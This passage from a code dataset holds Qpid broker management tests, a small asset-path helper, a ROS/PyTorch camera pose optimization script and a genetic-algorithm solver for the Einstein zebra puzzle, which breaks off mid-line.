self.qmf_broker.getSessionId()\n brokerSessions = self.qmf.getObjects(_class=\"session\")\n\n found = False\n for bs in brokerSessions:\n if bs.name.endswith(sessionId):\n found = True\n self.assertEqual (found, True)\n\n def test_standard_exchanges (self):\n self.startQmf()\n\n exchanges = self.qmf.getObjects(_class=\"exchange\")\n exchange = self.findExchange (exchanges, \"\")\n self.assertEqual (exchange.type, \"direct\")\n exchange = self.findExchange (exchanges, \"amq.direct\")\n self.assertEqual (exchange.type, \"direct\")\n exchange = self.findExchange (exchanges, \"amq.topic\")\n self.assertEqual (exchange.type, \"topic\")\n exchange = self.findExchange (exchanges, \"amq.fanout\")\n 
self.assertEqual (exchange.type, \"fanout\")\n exchange = self.findExchange (exchanges, \"amq.match\")\n self.assertEqual (exchange.type, \"headers\")\n exchange = self.findExchange (exchanges, \"qpid.management\")\n self.assertEqual (exchange.type, \"topic\")\n\n def findExchange (self, exchanges, name):\n for exchange in exchanges:\n if exchange.name == name:\n return exchange\n return None\n\n def test_move_queued_messages_empty(self):\n \"\"\"\n Test that moving messages from an empty queue does not cause an error.\n \"\"\"\n self.startQmf()\n session = self.session\n \"Set up source queue\"\n session.queue_declare(queue=\"src-queue-empty\", exclusive=True, auto_delete=True)\n\n \"Set up destination queue\"\n session.queue_declare(queue=\"dest-queue-empty\", exclusive=True, auto_delete=True)\n\n queues = self.qmf.getObjects(_class=\"queue\")\n\n \"Move all messages from src-queue-empty to dest-queue-empty\"\n result = self.qmf.getObjects(_class=\"broker\")[0].queueMoveMessages(\"src-queue-empty\", \"dest-queue-empty\", 0, {})\n self.assertEqual (result.status, 0) \n\n sq = self.qmf.getObjects(_class=\"queue\", name=\"src-queue-empty\")[0]\n dq = self.qmf.getObjects(_class=\"queue\", name=\"dest-queue-empty\")[0]\n\n self.assertEqual (sq.msgDepth,0)\n self.assertEqual (dq.msgDepth,0)\n\n def test_move_queued_messages(self):\n \"\"\"\n Test ability to move messages from the head of one queue to another.\n Need to test moveing all and N messages.\n \"\"\"\n self.startQmf()\n session = self.session\n \"Set up source queue\"\n session.queue_declare(queue=\"src-queue\", exclusive=True, auto_delete=True)\n session.exchange_bind(queue=\"src-queue\", exchange=\"amq.direct\", binding_key=\"routing_key\")\n\n twenty = range(1,21)\n props = session.delivery_properties(routing_key=\"routing_key\")\n for count in twenty:\n body = \"Move Message %d\" % count\n src_msg = Message(props, body)\n session.message_transfer(destination=\"amq.direct\", message=src_msg)\n\n \"Set up destination queue\"\n session.queue_declare(queue=\"dest-queue\", exclusive=True, auto_delete=True)\n session.exchange_bind(queue=\"dest-queue\", exchange=\"amq.direct\")\n\n queues = self.qmf.getObjects(_class=\"queue\")\n\n \"Move 10 messages from src-queue to dest-queue\"\n result = self.qmf.getObjects(_class=\"broker\")[0].queueMoveMessages(\"src-queue\", \"dest-queue\", 10, {})\n self.assertEqual (result.status, 0) \n\n sq = self.qmf.getObjects(_class=\"queue\", name=\"src-queue\")[0]\n dq = self.qmf.getObjects(_class=\"queue\", name=\"dest-queue\")[0]\n\n self.assertEqual (sq.msgDepth,10)\n self.assertEqual (dq.msgDepth,10)\n\n \"Move all remaining messages to destination\"\n result = self.qmf.getObjects(_class=\"broker\")[0].queueMoveMessages(\"src-queue\", \"dest-queue\", 0, {})\n self.assertEqual (result.status,0)\n\n sq = self.qmf.getObjects(_class=\"queue\", name=\"src-queue\")[0]\n dq = self.qmf.getObjects(_class=\"queue\", name=\"dest-queue\")[0]\n\n self.assertEqual (sq.msgDepth,0)\n self.assertEqual (dq.msgDepth,20)\n\n \"Use a bad source queue name\"\n result = self.qmf.getObjects(_class=\"broker\")[0].queueMoveMessages(\"bad-src-queue\", \"dest-queue\", 0, {})\n self.assertEqual (result.status,4)\n\n \"Use a bad destination queue name\"\n result = self.qmf.getObjects(_class=\"broker\")[0].queueMoveMessages(\"src-queue\", \"bad-dest-queue\", 0, {})\n self.assertEqual (result.status,4)\n\n \" Use a large qty (40) to move from dest-queue back to \"\n \" src-queue- should move all \"\n result = 
self.qmf.getObjects(_class=\"broker\")[0].queueMoveMessages(\"dest-queue\", \"src-queue\", 40, {})\n self.assertEqual (result.status,0)\n\n sq = self.qmf.getObjects(_class=\"queue\", name=\"src-queue\")[0]\n dq = self.qmf.getObjects(_class=\"queue\", name=\"dest-queue\")[0]\n\n self.assertEqual (sq.msgDepth,20)\n self.assertEqual (dq.msgDepth,0)\n\n \"Consume the messages of the queue and check they are all there in order\"\n session.message_subscribe(queue=\"src-queue\", destination=\"tag\")\n session.message_flow(destination=\"tag\", unit=session.credit_unit.message, value=0xFFFFFFFF)\n session.message_flow(destination=\"tag\", unit=session.credit_unit.byte, value=0xFFFFFFFF)\n queue = session.incoming(\"tag\")\n for count in twenty:\n consumed_msg = queue.get(timeout=1)\n body = \"Move Message %d\" % count\n self.assertEqual(body, consumed_msg.body)\n\n def test_purge_queue(self):\n \"\"\"\n Test ability to purge messages from the head of a queue.\n Need to test moveing all, 1 (top message) and N messages.\n \"\"\"\n self.startQmf()\n session = self.session\n \"Set up purge queue\"\n session.queue_declare(queue=\"purge-queue\", exclusive=True, auto_delete=True)\n session.exchange_bind(queue=\"purge-queue\", exchange=\"amq.direct\", binding_key=\"routing_key\")\n\n twenty = range(1,21)\n props = session.delivery_properties(routing_key=\"routing_key\")\n for count in twenty:\n body = \"Purge Message %d\" % count\n msg = Message(props, body)\n session.message_transfer(destination=\"amq.direct\", message=msg)\n\n pq = self.qmf.getObjects(_class=\"queue\", name=\"purge-queue\")[0]\n\n \"Purge top message from purge-queue\"\n result = pq.purge(1, {})\n self.assertEqual (result.status, 0) \n pq = self.qmf.getObjects(_class=\"queue\", name=\"purge-queue\")[0]\n self.assertEqual (pq.msgDepth,19)\n\n \"Purge top 9 messages from purge-queue\"\n result = pq.purge(9, {})\n self.assertEqual (result.status, 0) \n pq = self.qmf.getObjects(_class=\"queue\", name=\"purge-queue\")[0]\n self.assertEqual (pq.msgDepth,10)\n\n \"Purge all messages from purge-queue\"\n result = pq.purge(0, {})\n self.assertEqual (result.status, 0) \n pq = self.qmf.getObjects(_class=\"queue\", name=\"purge-queue\")[0]\n self.assertEqual (pq.msgDepth,0)\n\n def test_reroute_priority_queue(self):\n self.startQmf()\n session = self.session\n\n #setup test queue supporting multiple priority levels\n session.queue_declare(queue=\"test-queue\", exclusive=True, auto_delete=True, arguments={'x-qpid-priorities':10})\n\n #send some messages of varying priority to that queue:\n for i in range(0, 5):\n deliveryProps = session.delivery_properties(routing_key=\"test-queue\", priority=i+5)\n session.message_transfer(message=Message(deliveryProps, \"Message %d\" % (i+1)))\n\n\n #declare and bind a queue to amq.fanout through which rerouted\n #messages can be verified:\n session.queue_declare(queue=\"rerouted\", exclusive=True, auto_delete=True, arguments={'x-qpid-priorities':10})\n session.exchange_bind(queue=\"rerouted\", exchange=\"amq.fanout\")\n\n #reroute messages from test queue to amq.fanout (and hence to\n #rerouted queue):\n pq = self.qmf.getObjects(_class=\"queue\", name=\"test-queue\")[0]\n result = pq.reroute(0, False, \"amq.fanout\", {})\n self.assertEqual(result.status, 0) \n\n #verify messages are all rerouted:\n self.subscribe(destination=\"incoming\", queue=\"rerouted\")\n incoming = session.incoming(\"incoming\")\n for i in range(0, 5):\n msg = incoming.get(timeout=1)\n self.assertEqual(\"Message %d\" % (5-i), msg.body)\n\n\n 
def test_reroute_queue(self):\n \"\"\"\n Test ability to reroute messages from the head of a queue.\n Need to test moving all, 1 (top message) and N messages.\n \"\"\"\n self.startQmf()\n session = self.session\n \"Set up test queue\"\n session.exchange_declare(exchange=\"alt.direct1\", type=\"direct\")\n session.queue_declare(queue=\"alt-queue1\", exclusive=True, auto_delete=True)\n session.exchange_bind(queue=\"alt-queue1\", exchange=\"alt.direct1\", binding_key=\"routing_key\")\n session.exchange_declare(exchange=\"alt.direct2\", type=\"direct\")\n session.queue_declare(queue=\"alt-queue2\", exclusive=True, auto_delete=True)\n session.exchange_bind(queue=\"alt-queue2\", exchange=\"alt.direct2\", binding_key=\"routing_key\")\n session.queue_declare(queue=\"reroute-queue\", exclusive=True, auto_delete=True, alternate_exchange=\"alt.direct1\")\n session.exchange_bind(queue=\"reroute-queue\", exchange=\"amq.direct\", binding_key=\"routing_key\")\n\n twenty = range(1,21)\n props = session.delivery_properties(routing_key=\"routing_key\")\n mp = session.message_properties(application_headers={'x-qpid.trace' : 'A,B,C'})\n for count in twenty:\n body = \"Reroute Message %d\" % count\n msg = Message(props, mp, body)\n session.message_transfer(destination=\"amq.direct\", message=msg)\n\n pq = self.qmf.getObjects(_class=\"queue\", name=\"reroute-queue\")[0]\n\n \"Reroute top message from reroute-queue to alternate exchange\"\n result = pq.reroute(1, True, \"\", {})\n self.assertEqual(result.status, 0) \n pq.update()\n aq = self.qmf.getObjects(_class=\"queue\", name=\"alt-queue1\")[0]\n self.assertEqual(pq.msgDepth,19)\n self.assertEqual(aq.msgDepth,1)\n\n \"Verify that the trace was cleared on the rerouted message\"\n url = \"%s://%s:%d\" % (self.broker.scheme or \"amqp\", self.broker.host, self.broker.port or 5672)\n conn = qpid.messaging.Connection(url)\n conn.open()\n sess = conn.session()\n rx = sess.receiver(\"alt-queue1;{mode:browse}\")\n rm = rx.fetch(1)\n self.assertEqual(rm.properties['x-qpid.trace'], '')\n conn.close()\n\n \"Reroute top 9 messages from reroute-queue to alt.direct2\"\n result = pq.reroute(9, False, \"alt.direct2\", {})\n self.assertEqual(result.status, 0) \n pq.update()\n aq = self.qmf.getObjects(_class=\"queue\", name=\"alt-queue2\")[0]\n self.assertEqual(pq.msgDepth,10)\n self.assertEqual(aq.msgDepth,9)\n\n \"Reroute using a non-existent exchange\"\n result = pq.reroute(0, False, \"amq.nosuchexchange\", {})\n self.assertEqual(result.status, 4)\n\n \"Reroute all messages from reroute-queue\"\n result = pq.reroute(0, False, \"alt.direct2\", {})\n self.assertEqual(result.status, 0) \n pq.update()\n aq = self.qmf.getObjects(_class=\"queue\", name=\"alt-queue2\")[0]\n self.assertEqual(pq.msgDepth,0)\n self.assertEqual(aq.msgDepth,19)\n\n \"Make more messages\"\n twenty = range(1,21)\n props = session.delivery_properties(routing_key=\"routing_key\")\n for count in twenty:\n body = \"Reroute Message %d\" % count\n msg = Message(props, body)\n session.message_transfer(destination=\"amq.direct\", message=msg)\n\n \"Reroute onto the same queue\"\n result = pq.reroute(0, False, \"amq.direct\", {})\n self.assertEqual(result.status, 0) \n pq.update()\n self.assertEqual(pq.msgDepth,20)\n\n def test_reroute_alternate_exchange(self):\n \"\"\"\n Test that when rerouting, the alternate-exchange is considered if relevant\n \"\"\"\n self.startQmf()\n session = self.session\n # 1. 
Create 2 exchanges A and B (fanout) where B is the\n # alternate exchange for A\n session.exchange_declare(exchange=\"B\", type=\"fanout\")\n session.exchange_declare(exchange=\"A\", type=\"fanout\", alternate_exchange=\"B\")\n\n # 2. Bind queue X to B\n session.queue_declare(queue=\"X\", exclusive=True, auto_delete=True)\n session.exchange_bind(queue=\"X\", exchange=\"B\")\n\n # 3. Send 1 message to queue Y\n session.queue_declare(queue=\"Y\", exclusive=True, auto_delete=True)\n props = session.delivery_properties(routing_key=\"Y\")\n session.message_transfer(message=Message(props, \"reroute me!\"))\n\n # 4. Call reroute on queue Y and specify that messages should\n # be sent to exchange A\n y = self.qmf.getObjects(_class=\"queue\", name=\"Y\")[0]\n result = y.reroute(1, False, \"A\", {})\n self.assertEqual(result.status, 0)\n\n # 5. verify that the message is rerouted through B (as A has\n # no matching bindings) to X\n self.subscribe(destination=\"x\", queue=\"X\")\n self.assertEqual(\"reroute me!\", session.incoming(\"x\").get(timeout=1).body)\n\n # Cleanup\n for e in [\"A\", \"B\"]: session.exchange_delete(exchange=e)\n\n def test_reroute_invalid_alt_exchange(self):\n \"\"\"\n Test that an error is returned for an attempt to reroute to\n alternate exchange on a queue for which no such exchange has\n been defined.\n \"\"\"\n self.startQmf()\n session = self.session\n # create queue with no alt-exchange, and send a message to it\n session.queue_declare(queue=\"q\", exclusive=True, auto_delete=True)\n props = session.delivery_properties(routing_key=\"q\")\n session.message_transfer(message=Message(props, \"don't reroute me!\"))\n\n # attempt to reroute the message to alt-exchange\n q = self.qmf.getObjects(_class=\"queue\", name=\"q\")[0]\n result = q.reroute(1, True, \"\", {})\n # verify the attempt fails...\n self.assertEqual(result.status, 4) #invalid parameter\n\n # ...and message is still on the queue\n self.subscribe(destination=\"d\", queue=\"q\")\n self.assertEqual(\"don't reroute me!\", session.incoming(\"d\").get(timeout=1).body)\n\n\n def test_methods_async (self):\n \"\"\"\n \"\"\"\n class Handler (qmf.console.Console):\n def __init__(self):\n self.cv = Condition()\n self.xmtList = {}\n self.rcvList = {}\n\n def methodResponse(self, broker, seq, response):\n self.cv.acquire()\n try:\n self.rcvList[seq] = response\n finally:\n self.cv.release()\n\n def request(self, broker, count):\n self.count = count\n for idx in range(count):\n self.cv.acquire()\n try:\n seq = broker.echo(idx, \"Echo Message\", _async = True)\n self.xmtList[seq] = idx\n finally:\n self.cv.release()\n\n def check(self):\n if self.count != len(self.xmtList):\n return \"fail (attempted send=%d, actual sent=%d)\" % (self.count, len(self.xmtList))\n lost = 0\n mismatched = 0\n for seq in self.xmtList:\n value = self.xmtList[seq]\n if seq in self.rcvList:\n result = self.rcvList.pop(seq)\n if result.sequence != value:\n mismatched += 1\n else:\n lost += 1\n spurious = len(self.rcvList)\n if lost == 0 and mismatched == 0 and spurious == 0:\n return \"pass\"\n else:\n return \"fail (lost=%d, mismatch=%d, spurious=%d)\" % (lost, mismatched, spurious)\n\n handler = Handler()\n self.startQmf(handler)\n brokers = self.qmf.getObjects(_class=\"broker\")\n self.assertEqual(len(brokers), 1)\n broker = brokers[0]\n handler.request(broker, 20)\n sleep(1)\n self.assertEqual(handler.check(), \"pass\")\n\n def test_connection_close(self):\n \"\"\"\n Test management method for closing connection\n \"\"\"\n self.startQmf()\n conn 
= self.connect()\n session = conn.session(\"my-named-session\")\n\n #using qmf find named session and close the corresponding connection:\n qmf_ssn_object = [s for s in self.qmf.getObjects(_class=\"session\") if s.name.endswith(\"my-named-session\")][0]\n qmf_ssn_object._connectionRef_.close()\n\n #check that connection is closed\n try:\n conn.session(\"another-session\")\n self.fail(\"Expected failure from closed connection\")\n except: None\n\n #make sure that the named session has been closed and the name can be re-used\n conn = self.connect()\n session = conn.session(\"my-named-session\")\n session.queue_declare(queue=\"whatever\", exclusive=True, auto_delete=True)\n\n def test_immediate_method(self):\n url = \"%s://%s:%d\" % (self.broker.scheme or \"amqp\", self.broker.host or \"localhost\", self.broker.port or 5672)\n conn = qpid.messaging.Connection(url)\n conn.open()\n sess = conn.session()\n replyTo = \"qmf.default.direct/reply_immediate_method_test;{node:{type:topic}}\"\n agent_sender = sess.sender(\"qmf.default.direct/broker\")\n agent_receiver = sess.receiver(replyTo)\n queue_create = sess.sender(\"test-queue-imm-method;{create:always,delete:always,node:{type:queue,durable:False,x-declare:{auto-delete:True}}}\")\n\n method_request = {'_method_name':'reroute','_object_id':{'_object_name':'org.apache.qpid.broker:queue:test-queue-imm-method'}}\n method_request['_arguments'] = {'request':0, 'useAltExchange':False, 'exchange':'amq.fanout'}\n\n reroute_call = qpid.messaging.Message(method_request)\n reroute_call.properties['qmf.opcode'] = '_method_request'\n reroute_call.properties['x-amqp-0-10.app-id'] = 'qmf2'\n reroute_call.reply_to = replyTo\n\n agent_sender.send(reroute_call)\n result = agent_receiver.fetch(3)\n self.assertEqual(result.properties['qmf.opcode'], '_method_response')\n\n conn.close()\n\n def test_binding_count_on_queue(self):\n self.startQmf()\n conn = self.connect()\n session = self.session\n\n QUEUE = \"binding_test_queue\"\n EX_DIR = \"binding_test_exchange_direct\"\n EX_FAN = \"binding_test_exchange_fanout\"\n EX_TOPIC = \"binding_test_exchange_topic\"\n EX_HDR = \"binding_test_exchange_headers\"\n\n #\n # Create a test queue\n #\n session.queue_declare(queue=QUEUE, exclusive=True, auto_delete=True)\n queue = self.qmf.getObjects(_class=\"queue\", name=QUEUE)[0]\n if not queue:\n self.fail(\"Queue not found\")\n self.assertEqual(queue.bindingCount, 1, \"wrong initial binding count\")\n\n #\n # Create an exchange of each supported type\n #\n session.exchange_declare(exchange=EX_DIR, type=\"direct\")\n session.exchange_declare(exchange=EX_FAN, type=\"fanout\")\n session.exchange_declare(exchange=EX_TOPIC, type=\"topic\")\n session.exchange_declare(exchange=EX_HDR, type=\"headers\")\n\n #\n # Bind each exchange to the test queue\n #\n match = {}\n match['x-match'] = \"all\"\n match['key'] = \"value\"\n session.exchange_bind(exchange=EX_DIR, queue=QUEUE, binding_key=\"key1\")\n session.exchange_bind(exchange=EX_DIR, queue=QUEUE, binding_key=\"key2\")\n session.exchange_bind(exchange=EX_FAN, queue=QUEUE)\n session.exchange_bind(exchange=EX_TOPIC, queue=QUEUE, binding_key=\"key1.#\")\n session.exchange_bind(exchange=EX_TOPIC, queue=QUEUE, binding_key=\"key2.#\")\n session.exchange_bind(exchange=EX_HDR, queue=QUEUE, binding_key=\"key1\", arguments=match)\n match['key2'] = \"value2\"\n session.exchange_bind(exchange=EX_HDR, queue=QUEUE, binding_key=\"key2\", arguments=match)\n\n #\n # Verify that the queue's binding count accounts for the new bindings\n #\n 
queue.update()\n self.assertEqual(queue.bindingCount, 8,\n \"added bindings not accounted for (expected 8, got %d)\" % queue.bindingCount)\n\n #\n # Remove some of the bindings\n #\n session.exchange_unbind(exchange=EX_DIR, queue=QUEUE, binding_key=\"key2\")\n session.exchange_unbind(exchange=EX_TOPIC, queue=QUEUE, binding_key=\"key2.#\")\n session.exchange_unbind(exchange=EX_HDR, queue=QUEUE, binding_key=\"key2\")\n\n #\n # Verify that the queue's binding count accounts for the deleted bindings\n #\n queue.update()\n self.assertEqual(queue.bindingCount, 5,\n \"deleted bindings not accounted for (expected 5, got %d)\" % queue.bindingCount)\n #\n # Delete the exchanges\n #\n session.exchange_delete(exchange=EX_DIR)\n session.exchange_delete(exchange=EX_FAN)\n session.exchange_delete(exchange=EX_TOPIC)\n session.exchange_delete(exchange=EX_HDR)\n\n #\n # Verify that the queue's binding count accounts for the lost bindings\n #\n queue.update()\n self.assertEqual(queue.bindingCount, 1,\n \"deleted bindings not accounted for (expected 1, got %d)\" % queue.bindingCount)\n\n def test_connection_stats(self):\n \"\"\"\n Test message in/out stats for connection\n \"\"\"\n agent = self.setup_access()\n conn = self.connect()\n session = conn.session(\"stats-session\")\n\n #using qmf find named session and the corresponding connection:\n conn_qmf = None\n sessions = agent.getAllSessions()\n for s in sessions:\n if s.name.endswith(\"stats-session\"):\n conn_qmf = agent.getConnection(s.connectionRef)\n\n assert(conn_qmf)\n \n #send a message to a queue\n session.queue_declare(queue=\"stats-q\", exclusive=True, auto_delete=True)\n session.message_transfer(message=Message(session.delivery_properties(routing_key=\"stats-q\"), \"abc\"))\n \n #check the 'msgs sent from' stat for this connection\n conn_qmf.update()\n self.assertEqual(conn_qmf.msgsFromClient, 1)\n\n #receive message from queue\n session.message_subscribe(destination=\"d\", queue=\"stats-q\")\n incoming = session.incoming(\"d\")\n incoming.start()\n self.assertEqual(\"abc\", incoming.get(timeout=1).body)\n\n #check the 'msgs sent to' stat for this connection\n conn_qmf.update()\n self.assertEqual(conn_qmf.msgsToClient, 1)\n\n def test_timestamp_config(self):\n \"\"\"\n Test message timestamping control.\n \"\"\"\n self.startQmf()\n conn = self.connect()\n session = conn.session(\"timestamp-session\")\n\n #verify that receive message timestamping is OFF by default\n broker = self.qmf.getObjects(_class=\"broker\")[0]\n rc = broker.getTimestampConfig()\n self.assertEqual(rc.status, 0)\n self.assertEqual(rc.text, \"OK\")\n\n #try to enable it\n rc = broker.setTimestampConfig(True)\n self.assertEqual(rc.status, 0)\n self.assertEqual(rc.text, \"OK\")\n\n rc = broker.getTimestampConfig()\n self.assertEqual(rc.status, 0)\n self.assertEqual(rc.text, \"OK\")\n self.assertEqual(rc.receive, True)\n\n # setup a connection & session to the broker\n url = \"%s://%s:%d\" % (self.broker.scheme or \"amqp\", self.broker.host or \"localhost\", self.broker.port or 5672)\n conn = qpid.messaging.Connection(url)\n conn.open()\n sess = conn.session()\n\n #send a message to a queue\n sender = sess.sender(\"ts-q; {create:sender, delete:receiver}\")\n sender.send( qpid.messaging.Message(content=\"abc\") )\n\n #receive message from queue, and verify timestamp is present\n receiver = sess.receiver(\"ts-q\")\n try:\n msg = receiver.fetch(timeout=1)\n except Empty:\n assert(False)\n self.assertEqual(\"abc\", msg.content)\n self.assertEqual(True, \"x-amqp-0-10.timestamp\" in 
msg.properties)\n assert(msg.properties[\"x-amqp-0-10.timestamp\"])\n\n #try to disable it\n rc = broker.setTimestampConfig(False)\n self.assertEqual(rc.status, 0)\n self.assertEqual(rc.text, \"OK\")\n\n rc = broker.getTimestampConfig()\n self.assertEqual(rc.status, 0)\n self.assertEqual(rc.text, \"OK\")\n self.assertEqual(rc.receive, False)\n\n #send another message to the queue\n sender.send( qpid.messaging.Message(content=\"def\") )\n\n #receive message from queue, and verify timestamp is NOT PRESENT\n receiver = sess.receiver(\"ts-q\")\n try:\n msg = receiver.fetch(timeout=1)\n except Empty:\n assert(False)\n self.assertEqual(\"def\", msg.content)\n self.assertEqual(False, \"x-amqp-0-10.timestamp\" in msg.properties)\n\n","sub_path":"qpid_tests/broker_0_10/management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":29438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"10086786","text":"import sys\n\nfrom pathlib import Path\nfrom pybullet_data import getDataPath\n\n\ndef augment_path(file_name):\n roots = [\n Path(__file__).parent.parent / 'assets', # local\n Path(sys.prefix) / 'etc' / 'mime' / 'assets', # global\n Path(getDataPath())]\n for root in roots:\n path = root / file_name\n if path.exists():\n return path\n return Path(file_name)\n","sub_path":"mime/scene/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"476546785","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport rospkg\nFE_PATH = rospkg.RosPack().get_path('trajectory_optimization')\nsys.path.append(os.path.join(FE_PATH, 'src/'))\nimport torch\nfrom tqdm import tqdm\nimport numpy as np\nimport cv2\nfrom tools import render_pc_image\nfrom tools import hidden_pts_removal\nfrom tools import load_intrinsics\nfrom model import ModelPose\nimport torch.nn.functional as F\nfrom pytorch3d.transforms import random_quaternions\nfrom time import time\nimport rospy\nimport tf\nfrom tools import publish_odom\nfrom tools import publish_pointcloud\nfrom tools import publish_tf_pose\nfrom tools import publish_camera_info\nfrom tools import publish_image\n\n\n## Get parameters values\npub_sample = rospy.get_param('pose_opt/pub_sample', 10)\nN_steps = rospy.get_param('pose_opt/opt_steps', 400)\nlr_pose = rospy.get_param('pose_opt/lr_pose', 0.1)\nlr_quat = rospy.get_param('pose_opt/lr_quat', 0.1)\n\nif torch.cuda.is_available():\n device = torch.device(\"cuda:0\")\n torch.cuda.set_device(device)\nelse:\n device = torch.device(\"cpu\")\n\n\nif __name__ == \"__main__\":\n rospy.init_node('camera_pose_optimization')\n # Load point cloud\n\n # Initialize camera parameters\n K, img_width, img_height = load_intrinsics(device=device)\n\n # Set paths to data\n index = np.random.choice(range(0, 30))\n points_filename = os.path.join(FE_PATH, f\"data/points/point_cloud_{index}.npz\")\n pts_np = np.load(points_filename)['pts']\n # make sure the point cloud is of (N x 3) shape:\n if pts_np.shape[1] > pts_np.shape[0]:\n pts_np = pts_np.transpose()\n points = torch.tensor(pts_np, dtype=torch.float32).to(device)\n\n # Initial position to optimize\n trans0 = torch.tensor([[6.0, 2.0, 0.0]], dtype=torch.float32)\n\n # xyzw = torch.tensor([0., 0., 0., 1.], dtype=torch.float32)\n # xyzw = tf.transformations.quaternion_from_euler(0.0, np.pi/2, 0.0)\n # q0 = torch.tensor([[xyzw[3], xyzw[0], xyzw[1], xyzw[2]]], dtype=torch.float32)\n q0 = 
random_quaternions(1)\n\n # Initialize a model\n model = ModelPose(points=points,\n trans0=trans0,\n q0=q0,\n intrins=K,\n img_width=img_width, img_height=img_height,\n min_dist=1.0, max_dist=5.0,\n device=device).to(device)\n\n # Create an optimizer. Here we are using Adam and we pass in the parameters of the model\n optimizer = torch.optim.Adam([\n {'params': list([model.trans]), 'lr': lr_pose},\n {'params': list([model.quat]), 'lr': lr_quat},\n ])\n decayRate = 0.95\n lr_scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer=optimizer, gamma=decayRate)\n\n # Run optimization loop\n debug = False\n t_step = 0.0\n t_pub = 0.0\n for i in tqdm(range(N_steps)):\n if rospy.is_shutdown():\n break\n\n ## Optimization step\n t0 = time()\n optimizer.zero_grad()\n loss = model(debug=debug)\n loss.backward()\n optimizer.step()\n if i % int(N_steps//10) == 0:\n lr_scheduler.step()\n\n t_step += (time() - t0) / N_steps\n\n ## Data publication\n debug = False\n if i % pub_sample == 0:\n t2 = time()\n # debug = True\n\n # publish ROS msgs\n intensity = model.observations.unsqueeze(1).detach().cpu().numpy()\n pts_rewards = np.concatenate([pts_np, intensity],\n axis=1) # add observations for pts intensity visualization\n # pts_rewards = pts_np\n publish_pointcloud(pts_rewards, '/pts', rospy.Time.now(), 'world')\n quat = F.normalize(model.quat).squeeze()\n quat = (quat[1], quat[2], quat[3], quat[0])\n trans = model.trans.squeeze()\n publish_odom(trans, quat, frame='world', topic='/odom')\n publish_tf_pose(trans, quat, \"camera_frame\", frame_id=\"world\")\n publish_camera_info(topic_name=\"/camera/camera_info\", frame_id=\"camera_frame\")\n\n t_pub += (time() - t2) / N_steps * pub_sample\n\n print(f'Mean optimization time: {1000 * t_step} msec')\n print(f'Mean publication time: {1000 * t_pub} msec')\n","sub_path":"src/pose_optimization_sample.py","file_name":"pose_optimization_sample.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"429921131","text":"import random\n\nHOUSE = [1, 2, 3, 4, 5]\nCOLOR = ['red', 'green', 'white', 'yellow', 'blue']\nNATIONALITY = ['brit', 'swede', 'dane', 'norwegian', 'german']\nDRINK = ['tea', 'coffee', 'milk', 'beer', 'water']\nSMOKE = ['pall mall', 'dunhill', 'bluemaster', 'prince', 'blend']\nPET = ['dogs', 'birds', 'cats', 'horses', 'fish']\n\n# PERSON = [HOUSE, COLOR, NATIONALITY, DRINK, SMOKE, PET]\n\nPEOPLE_AMT = 5\nTRAITS_AMT = 6\n\nKNOWN_FACTS = [\n ['brit', 'red'],\n ['swede', 'dogs'],\n ['dane', 'tea'],\n ['green', 'coffee'],\n ['pall mall', 'birds'],\n ['yellow', 'dunhill'],\n ['milk', 3],\n ['norwegian', 1],\n ['bluemaster', 'beer'],\n ['german', 'prince'],\n]\n\nNEIGHBOURS = [\n ['green', 'white', 'left'], # green to the left of the white house\n ['blend', 'cats', 'next'],\n ['horses', 'dunhill', 'next'],\n ['norwegian', 'blue', 'next'],\n ['blend', 'water', 'next'],\n]\n\nSOLUTION = [\n [1, 'yellow', 'norwegian', 'water', 'dunhill', 'cats'],\n [2, 'blue', 'dane', 'tea', 'blend', 'horses'],\n [3, 'red', 'brit', 'milk', 'pall mall', 'birds'], \n [4, 'green', 'german', 'coffee', 'prince', 'fish'], \n [5, 'white', 'swede', 'beer', 'bluemaster', 'dogs']\n] \n\ndef check_neighbours(sectionA, sectionB, position):\n score = 0\n if position == 'left':\n if sectionA[0] == sectionB[0] - 1:\n score += 1 \n # print(sectionA, 'is on the left of', sectionB) \n\n elif position == 'next':\n if (sectionA[0] == sectionB[0] - 1 or\n sectionA[0] == sectionB[0] + 1):\n score += 1\n # print(sectionA, 'is next to', sectionB) \n\n return score\n\nclass DNA:\n def __init__(self):\n self.genes = []\n self.populate()\n self.fitness = 0\n self.points = 0\n \n def populate(self):\n \"\"\"\n Creates a list object with the genes, to fill the solution.\n \"\"\"\n\n traits1 = HOUSE[:]\n traits2 = COLOR[:]\n traits3 = NATIONALITY[:]\n traits4 = DRINK[:]\n traits5 = SMOKE[:]\n traits6 = PET[:]\n all_traits = [traits1, traits2, traits3, traits4, traits5, traits6]\n\n for trait in all_traits:\n random.shuffle(trait)\n \n for bunch in all_traits:\n for item in bunch:\n self.genes.append(item) \n\n def show(self):\n print('Hints completed:', self.points, '\\t \\t Fitness', self.fitness)\n for i in range(len(self.genes)):\n print(self.genes[i], end='\\t\\t\\t')\n if i in [4, 9, 14, 19, 24, 29]:\n print()\n\n def calc_fitness(self):\n people = []\n for i in range(PEOPLE_AMT):\n people.append([])\n \n for i in range(PEOPLE_AMT):\n for j in range(TRAITS_AMT):\n people[i].append(self.genes[i+(PEOPLE_AMT*j)])\n\n hint_points = 0 \n for gene in people: \n for hint in KNOWN_FACTS:\n if hint[0] in gene and hint[1] in gene:\n hint_points += 1\n\n for hint in NEIGHBOURS:\n houseA, houseB, position = hint\n if houseA in gene:\n for other in people:\n if houseB in other:\n hint_points += check_neighbours(gene, other, position)\n \n self.fitness = hint_points ** hint_points\n self.points = hint_points\n\n def crossover(self, other):\n \"\"\"\n It selects a random section of the dna to interchange with the other dna object.\n \"\"\"\n new_genes = []\n mid = random.choice([0, 5, 10, 15, 20, 25])\n for i in range(len(self.genes)):\n if i < mid:\n new_genes.append(self.genes[i])\n else:\n new_genes.append(other.genes[i])\n\n return new_genes\n\n def mutate(self, ratio):\n \"\"\"\n According to the given ratio applies a small change in some gene, \n by exchanging values of different indexes of the same section\n \"\"\"\n r = random.random()\n if r < ratio:\n start = random.choice([0, 5, 10, 15, 20, 25])\n end = start + 5\n section_copy = self.genes[start:end]\n # random.shuffle(section_copy)\n i1 = random.randint(0, 